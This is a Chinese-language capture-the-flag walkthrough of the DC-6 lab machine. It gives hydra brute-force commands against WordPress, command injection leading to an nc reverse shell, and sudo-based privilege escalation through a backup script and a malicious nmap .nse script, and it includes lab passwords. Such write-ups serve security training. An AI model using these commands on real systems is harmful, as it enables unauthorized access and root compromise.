DC-6 靶机攻略
扫描靶机
目录爆破
访问网站
http://192.168.200.146/wp-admin/把hosts文件加入192.168.200.146 wordy,进入网站
进入刚刚目录爆破出的后台页面
http://192.168.200.146/wp-admin/用wpscan扫用户名
wpscan--urlhttp://wordy--enumerateu用cewl爬网站生成密码
cewl http://wordy-wpass.txt爆破,但是没爆破出来
换一个更大的字典,直接跑kali自带的字典
hydra-Lusers.txt-P/usr/share/wordlists/rockyou.txt wordy http-post-form"/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location"-t20-F这也太久了,全部跑完10天往上了,查资料发现mark的密码是helpdesk01,刚好rockyou字典里有,就当爆破出来了,登录mark的账号
找到可以输入IP的工具,试试能不能命令注入
确实可以注入,反弹shell,由于输入框限制了字数,改发包
Bash不行,换nc,成功
获取伪终端
python-c'import pty;pty.spawn("/bin/bash")'查看提权点
sudo-lfind/-perm-4000-typef2>/dev/null查看文件,发现在mark家目录里有一个thingtodo文件,记录了graham的密码
GSo7isUM1D4登录graham账户
查看提权点,发现graham 可以以 jens 身份无密码执行/home/jens/backups.sh
往脚本加入/bin/bash
以jens身份跑该脚本
sudo-ujens /home/jens/backups.sh查看提权点,jens可以以root身份无密码执行nmap
nmap 有一个--script参数,可以加载外部的 lua 脚本执行,可以写一个脚本来获取root shell
echo'os.execute("/bin/sh")'>/tmp/root.nsesudonmap--script=/tmp/root.nse
--script参数只认 .nse(Nmap Scripting Engine)后缀的文件
拿到flag